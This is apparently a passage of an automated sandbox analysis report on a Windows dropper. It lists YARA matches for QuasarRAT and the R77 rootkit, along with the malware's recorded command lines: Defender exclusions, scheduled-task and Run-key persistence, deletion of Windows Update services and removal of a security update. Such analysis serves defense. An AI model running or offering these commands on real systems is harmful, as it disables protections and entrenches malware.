                    Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs 5fr5gthkjdg71.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                    Source: 5fr5gthkjdg71.exe, type: SAMPLEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 5fr5gthkjdg71.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 5fr5gthkjdg71.exe, type: SAMPLEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 68.2.conhost.exe.1a646d10000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 66.2.kaptsegthwf.exe.23e07fa0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 68.2.conhost.exe.1a646d40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 63.2.sc.exe.17cd5af0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 68.2.conhost.exe.1a646d10000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 66.2.kaptsegthwf.exe.23e07f70000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 63.2.sc.exe.17cd5b20000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 63.2.sc.exe.17cd5af0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: 68.2.conhost.exe.1a646d40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 63.2.sc.exe.17cd5b20000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 66.2.kaptsegthwf.exe.23e07fa0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPEDMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@124/27@0/1
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C7B6E8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF731C7B6E8
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,51_2_000000014000226C
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,51_2_00000001400019C4
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C985A4 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF731C985A4
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeFile created: C:\Program Files\CuisJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4351390Jump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7340:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeMutant created: \Sessions\1\BaseNamedObjects\HeBnAaAa__shmem3_winpthreads_tdm_
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeMutant created: \Sessions\1\BaseNamedObjects\Local\c3557859-56ac-475e-b44d-e1b60c20d0d0
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeFile created: C:\Users\user\AppData\Local\Temp\FA9.tmpJump to behavior
                    Source: 5fr5gthkjdg71.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 5fr5gthkjdg71.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 5fr5gthkjdg71.exeVirustotal: Detection: 76%
                    Source: 5fr5gthkjdg71.exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeFile read: C:\Users\user\Desktop\5fr5gthkjdg71.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\5fr5gthkjdg71.exe "C:\Users\user\Desktop\5fr5gthkjdg71.exe"
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess created: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe"
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess created: C:\Users\user\Desktop\GR55Qg1hth.exe "C:\Users\user\Desktop\GR55Qg1hth.exe"
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess created: C:\Users\user\Desktop\F4R5fd8grr.exe "C:\Users\user\Desktop\F4R5fd8grr.exe"
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"
                    Source: unknownProcess created: C:\Users\user\Desktop\F4R5fd8grr.exe C:\Users\user\Desktop\F4R5fd8grr.exe
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
